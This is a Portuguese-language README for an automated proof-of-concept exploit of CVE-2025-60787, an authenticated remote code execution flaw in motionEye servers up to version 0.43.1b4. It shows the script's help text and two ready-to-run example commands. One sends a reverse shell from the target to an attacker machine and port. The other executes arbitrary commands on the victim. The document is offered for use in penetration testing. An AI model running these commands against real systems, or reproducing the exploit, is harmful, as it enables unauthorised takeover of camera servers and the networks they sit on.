
PoC automatizado para CVE-2025-60787 fornecendo execução remota de código autenticada contra servidores motionEye até 0.43.1b4, com modos de shell reverso e execução de comandos.
PoC para CVE-2025-60787 que é uma vulnerabilidade de RCE autenticado para motionEye em todas as versões afetadas até 0.43.1b4 (inclusive).
Este é um PoC automatizado para a vulnerabilidade descrita em este repositório. Créditos a prabhatverma47.
O script tem 2 comandos que exploram a vulnerabilidade. Um que envia diretamente uma reverse shell chamado revshell e outro comando chamado command para executar diretamente comandos abusando desta CVE.
❯ python3 CVE-2025-60787.py -h
usage: CVE-2025-60787.py [-h] {revshell,command} ...
PoC for CVE-2025-60787 -- Authenticated RCE in motionEye by gunzf0x
positional arguments:
{revshell,command} Choose between send a reverse shell or (attempting to) run commands
revshell Attempt to send a reverse shell using CVE-2025-60787 vuln
command Execute a command remotely using CVE-2025-60787 vuln
options:
-h, --help show this help message and exit
Use o comando revshell para obter uma shell. Por exemplo:
python3 CVE-2025-60787.py revshell --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -i 10.10.10.15 --port 9001
Onde 10.10.10.10 é a máquina alvo (máquina executando motionEye), 10.10.10.15 é a nossa máquina atacante e 9001 é a porta na qual estamos ouvindo para capturar uma reverse shell.
Se, em vez de uma reverse shell, quisermos executar outros comandos remotamente, podemos usar a opção command. Por exemplo, execute o comando ping -c1 10.10.10.15 na máquina vítima:
python3 CVE-2025-60787.py command --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -e 'ping -c1 10.10.10.15'
Onde 10.10.10.10 é a máquina executando motionEye.
Use este script sempre por sua própria conta e risco.
Seja ético (: